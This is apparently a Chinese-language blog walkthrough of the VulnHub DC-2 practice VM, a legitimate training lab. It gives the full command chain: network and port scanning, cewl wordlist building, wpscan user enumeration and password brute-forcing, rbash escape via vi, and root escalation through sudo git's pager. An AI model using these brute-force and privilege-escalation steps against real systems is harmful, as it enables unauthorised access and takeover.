首页 > 其他分享 >DC-2

DC-2

时间:2024-08-18 18:38:15浏览次数:10  
标签:git DC 98.140 jerry 漏洞 192.168 txt

靶机介绍

  名称:DC-2

  发布日期:2019 年 3 月 22 日

  难度:初级

  下载地址:https://download.vulnhub.com/dc/DC-2.zip

环境搭建

  下载之后,解压,使用vmware导入或者virtualbox导入都可以,但注意要保证与你的攻击机在同一网段下,vmware要使用最新版

  ‍

  kali攻击机:192.168.98.136

靶机渗透

信息收集

扫描主机

netdiscover -i eth0(自己网卡的名称,有的外接网卡为wlan0) -r 192.168.1.40(自己虚拟机的IP)/24

netdiscover -i eth0 -r 192.168.98.136/24

image

  由于我只上线了一台靶机,所以该靶机的ip为 192.168.98.140

  ‍

扫描端口

masscan --rate=100000 -p 0-65535 192.168.98.140

image

  扫到一个80​端口和7744​端口,目前还不知道7744端口是干嘛的,再用nmap详细扫描一下22和80端口:

nmap -T4 -sV -O -p 22,80 192.168.98.140

image

nmap -A 192.168.98.140

image

  扫描出80端口有个网站,使用的wordpress框架

  访问192.168.98.140发现访问不了,这里需要改下本地的dns

# linux:
vim /etc/hosts
# windows:
C:\Windows\System32\drivers\etc\hosts

image

  访问界面如下:

image

  ‍

  ‍

web应用指纹信息

whatweb http://192.168.98.140

image

  wordPress 4.7.10版本

扫描目录

dirb http://192.168.98.140 /usr/share/dirb/wordlists/big.txt

image

image

  有用的目录:

# 登录页面
http://192.168.98.140/wp-admin/

漏洞挖掘

flag1

  这了有个flag,点击查看如下:

image

image

  意思是:你通常的单词表可能不起作用,所以,也许你只需要保持冷静。更多的密码总是更好的,但有时你无法赢得所有密码。以一个身份登录以查看下一个标志。如果找不到,请以其他身份登录。

  简单来说就是爆破行不通了

cewl 和 wpscan

  捕捉关键词:cewl

  ​cewl​是通过爬行网站获取关键信息创建一个密码字典dict.txt,如下;

cewl http://dc-2/index.php/flag/ -w dict.txt

  发现主题是wordpress,那就扫描一下用户吧,提示密码了,因该是让登录
使用wpscan​工具:

  ​WPScan​是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。
该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。

  枚举一下用户,枚举出admin,jerry,tom​:

wpscan --url http://dc-2 --enumerate u

image

image

  爆破一下用户名和密码:

# 创建一个users.txt文件,将用户名admin,jerry,tom存入
touch users.txt

  用刚刚抓取的密码字典dict.txt​和用户字典进行爆破,

wpscan --url http://dc-2/ -U users.txt -P dict.txt

  成功爆破出2个账户,但是没有admin:

 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

image

flag2

  在登录tom账号后没有发现有价值的东西,后又在登录jerry账号,在page页上发现了flag2:

image

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

image

  意思是无法利用这个wordpress,只能另想办法了,

  之前nmap扫描出了7744端口,那么我们是不是可以尝试ssh登录

ssh登录

  发现使用tom账号登录成功

ssh [email protected] -p 7744
parturient

image

flag3 (rbash逃逸)

  登录之后,发现目录下面有个flag3

image

  读取flag3的时候报错:-rbash: cat: command not found​ 这个错误信息表明你正在尝试在一个受限的bash shell环境中执行 cat​ 命令,但是这个环境没有提供 cat​ 命令。-rbash​ 是一个受限的bash shell,它限制了用户可以使用的命令集。

  可以看这篇文章来了解一下: Restricted Shell https://cloud.tencent.com/developer/article/1680551

  先尝试"/"能不能用

image

  cp命令

image

  FTP,GDB,main,git没有,发现vi可以用,那就试试把:

vi test
set shell=/bin/sh   #在vi末行模式中输入
shell  				#在vi末行模式中输入

image

  更改PATH或SHELL环境变量

# 查看
export -p

image

  修改path

export PATH="/usr/sbin:/usr/bin:/rbin:/bin"

  打开flag3.txt发现,提示要切换用户到jerry

  ​Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

image

image

  这个翻译,绷不住了

flag4

  切换到jerry用户:

su jerry
adipiscing

image

  在/home/jerry​ 目录下找到了flag4.txt

image

image

  没有提示,只能靠自己找到最后的flag!

  没招,查查攻略

  等会!翻译错了一句话:Go on - git outta here!!!!

  这句话提示的是 :git提权?!。。。

  注意有时候注意英文,有时候直译会出问题的。。。

git提权

sudo git help config

  前提是执行​sudo -l ​提示不需要密码可以使用git命令:

image

  下面将提示两种方法

  (我们需要将shell的窗口变窄,使得回显信息不能一页显示)

  1、sudo git help config #在末行命令模式输入
!/bin/bash 或 !'sh' #完成提权
2、sudo git -p help
!/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell

  ‍

image

  回车之后,成功提权:

image

最后的flag

  寻找flag:

find / -name *flag*

image

  拿下flag:

image

总结

  1. 考察 cewl 和 wpscan 工具的知识点,明白针对wordpress的漏洞利用
  2. rbash逃逸
  3. git提权
  4. 注意最好自己翻译英文,有时候机翻会出错的。

  ‍

标签:git,DC,98.140,jerry,漏洞,192.168,txt
From: https://www.cnblogs.com/itchen-2002/p/18365912/dc2-z2elwlg

相关文章

  • DC-1
    环境搭建靶机下载地址:https://download.vulnhub.com/dc/DC-1.zip选择高版本的vmware,不然可能不支持ova导入下载导入开机vmware设置选择nat模式,目的让你的攻击机和靶机在一个网段,可以根据网络环境自行设置只要在一个网段就行。‍kali攻击机:192.168.98.136......
  • DC-3
    靶机介绍名称:DC:3.2发布日期:25Apr2020难度:初级下载地址:https://download.vulnhub.com/dc/DC-3-2.zip环境搭建下载之后,解压,使用vmware导入或者virtualbox导入都可以,但注意要保证与你的攻击机在同一网段下,vmware要使用最新版‍kali攻击机:192......
  • DC-4
    靶机介绍靶场下载地址:https://download.vulnhub.com/dc/DC-4.zip环境搭建下载之后,解压,使用vmware导入或者virtualbox导入都可以,但注意要保证与你的攻击机在同一网段下,vmware要使用最新版kali攻击机:192.168.98.136靶机渗透信息收集扫描主机​​可知靶机......
  • ThreadCore学习
    1.线程中的异常处理一般线程里面不允许出现异常,需要自己处理好,最好在线程里加个trycatch,#region异常处理//线程里面的异常是被吞掉了,因为已经脱离了try的范围了,WaitAll抓到多线程里面全部的异常//线程里面不允许出现......
  • 身份证信息认证服务—— Identity IdCard OCR API
    IdentityIdCardOCRAPI对接说明本文将介绍一种通过输入身份证图片或姓名和身份证号码,来校验姓名和身份证号的真实性和一致性。本接口用于校验姓名和身份证号的真实性和一致性,您可以通过输入姓名和身份证号或传入身份证人像面照片提供所需验证信息。我们的上游是接入了......
  • 使用 preloadComponents 进行组件预加载
    title:使用preloadComponents进行组件预加载date:2024/8/18updated:2024/8/18author:cmdragonexcerpt:摘要:本文介绍Nuxt3中的preloadComponents功能,用于预加载全局注册的组件以减少首次渲染阻塞时间,通过实例演示如何设置并使用该工具来提升页面性能。categories:......
  • lit tailwindcss vite模板
    pnpmcreatevite@latestmy-project----templatelitcdmy-projectpnpminstall-Dtailwindcsspostcssautoprefixersass-embeddednpxtailwindcssinit-ptailwindcss.config.js:/**@type{import('tailwindcss').Config}*/exportdefault{core......
  • 震惊,ADC时钟频率不是84Mhz?
    前言单片机只能去处理数字量(0/1),但不能去处理一些多值数据(模拟电压值),如果需要处理模拟量,需要借助模数转换器(ADC)进行转换,把模拟量转换为MCU可以处理的离散数字量。一、ADC时钟说明由时钟树我们可知,ADC挂载在APB2上,那么它的频率本应该是84Mhz,但事实果真如此吗?其实不是的......
  • 关于ADC的一些总结
    前言        由于在STM32单片机中,主要是数字电路,而数字电路没有多少伏电压的概念,只有高电平和低电平两个概念,如果想要读取电压值,则需要经过ADC模数转换来读取对应引脚的模拟电压,然后存放到对应的寄存器种,通过变量来读取从而进行显示、判断等操作。1.ADC(Analog-Digita......
  • containerd + nerdctl安装
    下载所需依赖#containerd包wgethttps://github.com/containerd/containerd/releases/download/v1.6.8/containerd-1.6.8-linux-amd64.tar.gztarCxzvf/usr/localcontainerd-1.6.8-linux-amd64.tar.gz#runcwgethttps://github.com/opencontainers/runc/releases/downl......